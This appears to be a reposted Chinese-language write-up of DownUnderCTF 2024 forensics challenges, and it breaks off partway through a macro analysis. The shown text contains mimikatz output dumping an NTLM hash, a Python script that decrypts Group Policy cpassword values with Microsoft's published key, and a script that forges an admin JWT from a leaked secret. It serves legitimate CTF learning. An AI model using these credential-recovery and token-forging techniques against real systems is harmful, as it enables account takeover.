DownUnderCTF 2024 - Forensics
DownUnderCTF 2024 - ForensicsBaby's First Forensics
他们整个上午都在试图破坏我们的底子设施!他们正试图得到更多关于我们秘密袋鼠的信息!我们需要您的资助,我们已经捕获了一些他们攻击我们的流量,您能告诉我们他们使用的是什么工具及其版本吗?
注意:将您的答案包装在 DUCTF{} 中,比方 DUCTF{nmap_7.25}
附件:capture.pcap
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231854354-267106475.png
Nikto是一个网页服务器扫描器
DUCTF{Nikto_2.1.6}
SAM I AM
攻击者设法在我们的反叛者域控制器上得到了域管理员!看起来他们设法使用 WMI 使用帐户登录并转储了一些文件。
您能否重现他们如何使用提供的工件得到管理员密码?
将管理员帐户的密码放在 DUCTF{} 中,比方 DUCTF{password123!}
附件:samiam.zip
给了SAM和SYSTEM文件,要求得到管理员密码,自然可以想到用mimikatz
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz # lsadump::sam /sam:\sam.bak /system:\system.bak
Domain : DUCTF-AD
SysKey : a88f47504785ba029e8fa532c4c9e27b
Local SID : S-1-5-21-2461790198-1013503533-1008536141
SAMKey : 848804bda5d876ca7027beeee0efdd7c
RID: 000001f4 (500)
User : Administrator
Hash NTLM: 476b4dddbbffde29e739b618580adb1e
RID: 000001f5 (501)
User : Guest去cmd5解hash:476b4dddbbffde29e739b618580adb1e,得到!checkerboard1
感觉小老外应该有可以查到的网站不用爆金币..
DUCTF{!checkerboard1}
Bad Policies
看起来攻击者设法访问了反叛分子的域控制器。
你能弄清楚他们是如何从我们的一台 Outpost 呆板中提取这些文物后得到访问权限的吗?
附件:badpolicies.zip
参考:https://www.cnblogs.com/404p3rs0n/p/15675872.html
还原组策略中保存的密码
找到配置文件Groups.xml
值得注意的是此中的cpassword项,保存的是加密后的内容:
B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2加密方式为AES 256,虽然目前AES 256很难被攻破,但是微软选择公开了该AES 256加密的私钥
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231854840-1645691068.png
4e 99 06 e8fc b6 6c c9fa f4 93 1062 0f fe e8
f4 96 e8 06cc 05 79 9020 9b 09 a433 b6 6c 1b借助该私钥,我们就能还原出明文。
还原方式可接纳Chris Campbell @obscuresec开源的powershell脚本Get-GPPPassword.ps1
项目地址:https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration
该脚本可在域内主机上执行,能够自动查询共享文件夹\SYSVOL中的文件,还原出所有明文密码
powershell -executionpolicy bypass -file Get-GPPPassword.ps1这里只需要得到cpassword的值,可以直接利用如下代码进行解密
#!/usr/bin/python2
import sys
from Crypto.Cipher import AES
from base64 import b64decode
if(len(sys.argv) != 2):
print "decrypt.py <cpassword>"
sys.exit(0)
key = """4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b""".decode('hex')
cpassword = sys.argv
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
out = AES.new(key, AES.MODE_CBC, "\x00" * 16)
out = out.decrypt(password)
print out[:-ord(out[-1])].decode('utf16')https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231855079-1413655607.png
DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
emuc2
与所有优秀的民族国家一样,我们有本身的恶意软件和 C2 用于打击性操纵。但是有人得到了源代码,并用它来对付我们!这是我们在一台笔记本电脑上发现的流量捕获......
附件:sslkeylogfile.txt 、challenge.pcap
根据sslkeylogfile,联想到TLS
外部应用程序可以通过 Key Log 解密 TLS 连接。Wireshark 1.6.0 及以上版本可以使用该日记文件解密数据包。通过 Wireshark -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log file,告诉 Wireshark 去哪里探求 Key 文件。
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231855342-769422190.png
追踪TLS,在流34提到了JWT token大概待会用得到
PRI * HTTP/2.0
SM
..............d.....................................`u..h...A.......X..A-...G.lC.K..iy-"e^B.z...f.....S..j....5Ia.".g.M........
u.^E.1..l...).f..F..(7R......K..zJ.B%........*..(.3
....S.*/*..........................@....................................................N.h._..u.b
&=LtA.a..=.J..2.B...P,.m..eLZ7.@...Rd ...Vz.O_.5I-.BV!.=.....v..ru*.@....RKRVO....I.R?......@.......z.c...........O\.58..:......{"error":"Error validating JWT token - No token provided"}在流23得到大段加密数据,很可疑,追踪HTTP2 流
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231855666-489402059.png
表现了一个 URL 路径 /api/env ,一会应该也能用到
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856019-261799605.png
既然有http2了,都看一下
发现forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/login,用流量包内的用户密码登录
{"username": "jooospeh", "password": "n3v3r-g0nna-g1v3-th3-b1rds-up"}https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856331-943255486.png
提示没有权限检察flag,那么要么是找到密码登录管理员用户,要么就是伪造管理员用户登录,想起最早看到的JWT token,考虑伪造
结合刚才找到的/api/env内的大量数据,随便访问一个看看,如
https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/kMyYN2gsez9DQqovBkX4KwxRgpOAbxgbhttps://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856577-1316444971.png
那应该暗示此中的某个文件是有JWT token的,把刚才得到的路径保存
["YeIzRgKdWkx6EhyH8FPtQinoUI42yR7B","SENmvOvr1rC4BQQ7ugTi2Mht9UXUFQQH","3b2NQO9CM7ZinEyVNQkwkVx5r684TIwl","AbZ9FbNDzJ5ACbGKJ8ezjdod2Jr4x0iW","eWnjieXEMQ7Bj6tpLluchBBH7sDsCt3M","hLJh9TRNut3rSLWJQ6CsGs3OuNjmfYxb","M5ZU5KLyrjulq7QpLhKiJMwRrAMq3MZq","1awDrBxaMbwAhOcvfyntbliw3qanrSKT","FIJRM8kwWj1ye4JwPHg7IJg7PxJBtoXX","iu19ErtsjrQgTMohSnGJ46iMVai9ONOZ","2ervnWvp24g0pHZ81V3W9j2k0NmrkY1Z","T4yLN35GKLhxTgaykWxdgROCAwIBE3FO","HW8UkDvnQ8HFrTkyLHOIMMwywiTvCwfS","Cc5LKVk8n2N6F5BD9shXDlBX0NYG5RP3","YB64wqRiqblY7Bhk2z03bvwYLF9pk8o8","OxcOm5DyESp49smKwYmb6N9sr2yjZPv3","khmmeFNPFAhizYWKyvYMnLA7GVsJNvDt","Q3aoz6KBVGScMKS1Jfr6ewy9ix8q9elJ","jwbZUL8C5rj7DeuCEKZBGokgEh4ujMk1","LlqhKxf2yh8loi7ydfBBg18QKjDS33H0","kpSKlqhaNIL8g2EgACu3353i1p3Hh2CJ","n9tt6MNRJRoY8SIKqEoZnqxJpZmujQuR","1l4w5VOiIQ4pf7rid49GvvaXkhD5yIcw","ddl17btjos89HSpMlz4w1esNdp1BbPA7","jYyikfLWMl2nwZKLPZOI7yoX6Gsafj6Y","nx65kRioTaH87erafNtKaogarwPZYgn4","CU6ITn3A3r6PI089rdqbldt1MKSBOR8e","AYenVSd8ShOKt7in9tLAUTb1IPRminC4","BWO7KhzutnIAYRNdiUi6s4PMMheBFC4A","HlFqicDoJqA12cmHy8bnZd0GuSSqqL8q","8J71fW0218FzmBkF8ttefJrz7BpVtI8F","9QCWBIwQaNedL5NrTrymVUln0X9zDaPg","WbUwqhFlnuycALJgSSYb0VjeAgNtIhan","4GagZFf0emVWMqVZGuSQ0Wt3oesDqTId","hJgMfU0P4DZoXEQ3jPLmQqYrMcLL6tMq","Ie4Ct3weRbyqVZuU8D5WEJ9WzDaGkUeG","HBQW4v8Jx72LIeSA3gssnxODtUiR12iY","dlPoTSiQQhQW0LArsYjaXOlg5FhCECNX","1cLnEiDa0ZBFZMg0sRnB6uAGssFooEwd","h9ZZhUm8LRlXcTwSyPkhbyeH8WopzgK1","b6dQeUSvK6BaKu6hqGKjac1wljmECerf","vOW0m1zK5Ene3eEFxoYlGBDY6PhMG6Ug","4Hmer55iqHNq4fMbUgLTT96KDsceFHQz","TS9mqDcYUu9DUA1b9QoPqSeLMZFJNCKq","3zzwJVC13tWXVaBSwumerFZX10ZEwSx5","AL7Q1tqteIiAMoDAKLmx3PQ7uCtb1WCy","ggnR5ZzLSVr12T8k7cyRMAdlBuOLOQAr","w9SSZPc1qWUAGWE8pyLeB9XIRO79mzDs","u2YrePZCdoytCV6Eiund5dcubFdq2hPx","JShVnYgvoW5Lim3WL3qlqRMoTBGU4ATF","rnWQN9Hda8uDMoEqSdVGzvEtXuFJRZTT","u6dGg8b4YO8NylRJlTVnURjBxMlRmtVy","sD2esH8RTuqsD23PlfGCE0q5JdjnLb6t","ELfvFcLKnMyCwj7ruRbSkZKghcY4R2k6","xkzsLBLgP6dzDZYeiTzlwFpdsdS53fbg","L3VHzsrMHOPXtxfjsX9IEuMdWXiAN4lA","WGzrln1mR9mAgIYeCkkYZm5RIvdajkAi","9e1Y8jnY3j7Lkf8a03szPcqPqPDSGv6y","yTYSAZPsUbDCZbOg6XYBlFm7q6G4v3aq","rDmj6xnsGnm0MJQHvpuSbSXmkvanFQca","QFNahJX4von8pvpS5cy6bh2tyWGEcJwK","4LulvNMUoxwKcKXZm7DQxGOyZmUDAxn7","OiGiv5uCIyfNlTf0iePAiNe6lX3pVvJ7","nY8G2nYcKhvEJ5s2BD4SHECmTKKn1CSL","1K4qLxDn5gLF6gzcbetXP6HqGpghXmcI","4B4feCWkGFTlsoBI8Nxca380Xyv9sfA6","cDg0B5zh6q632VASxaeXNejqBABNFpWE","jZN0vVGts01Zr0xIJ6o2b6InEolghLr5","D8YzDAIwPFfLxwFcoCZSW02NzAoRM0lo","YCtiLWwcqptffHjTurKWv0zWlm87upmg","iSf2RPy3sdNeP6roA80UkxgqMrkOoXdf","nQD8z2wBoGOyIZ0311jUWAF0YlXsvg41","8ChT1ap67PVswJSBp6l7K8XLB8xlu89t","h83hTYu1lSFrhnMn1YrUxXdhRyy7lITP","oIjgXMJi0VvqTTvEY4G6ys7BjbQD9bpD","sd8CGK9j5eD0G8UUp0UkdgLc7tjxbkom","gSsaLGJVrbCvhXDa2tsgR9tZpzfd7gbS","GMBb01VPPfnMxJJTANYwfYnckBv0tB2w","JcMLJHRDcwmZ7T4OyoKZHg3A952Rbc3L","fLJBKWU3l5o7N1XxxVlG4JwyHCDqhJFY","ABgupVqa3fWHnbF6u4JH2tIzn4nuXf8e","1rJ4C9rcoWaW40fZEGA4vUY11azYLw04","aOLKa8rN9em0kQ0sfLeoRmVXY7L17Il1","6FND9ZASwt4GYHLuoCwFZ6JXYcYHuAh2","PqGpPjPKySbkf9tZkLS2X63xMHCwNUto","JOGVhN50FMGOUVZnkdDnlrO5OxA66hGA","II7JA9CiCbuvUwgxWP4j22iGBHzWg0SB","mQSKE3GIeUfYPgSF9zXKajKRRUCFyXPd"]整理一下,抓包爆破。
本来以为都是假文件,报完看长度发现很多都有参数。搜索关键词JWT直接定位
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231856864-1833019634.png
得到JWT
JWT_SECRET=3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi生成新的JWT,data泉源如下,就是刚才找到登录密码的流
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231857151-1351348247.png
import time
import jwt
data = {"subject_id": 1, "exp": 1920187883}
JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"
encoded = jwt.encode(data, JWT_SECRET, algorithm="HS512")
print(encoded)在网页更换JWT令牌后
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231857403-1065300123.png
得到flag
https://img2023.cnblogs.com/blog/3014109/202407/3014109-20240707231857678-767759829.png
DUCTF{pǝʇɔǝɟuᴉ_sᴉ_ǝlᴉɟ_dᴉz_ǝɥʇ_oʇ_pɹoʍssɐd_ǝɥʇ}
Macro Magic
我们设法从我们的一台 Outpost 呆板中提取了这个 excel 电子表格工件。它在引擎盖下发生了一些事变。打开后,我们发现并捕获了网络上的一些可疑流量。你能找出这个流量是什么并找到标志吗?
注意:您不需要运行或启用宏,因此请解决。
附件:macromagic.zip
提到了宏,而且提示不需要运行或启用宏。使用oledump.py分析,它可以不运行宏就能检察宏代码
项目地址:https://github.com/decalage2/oledump-contrib
需要配合 Python 模块OleFileIO_PL
pip install olefile使用
┌──(root
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]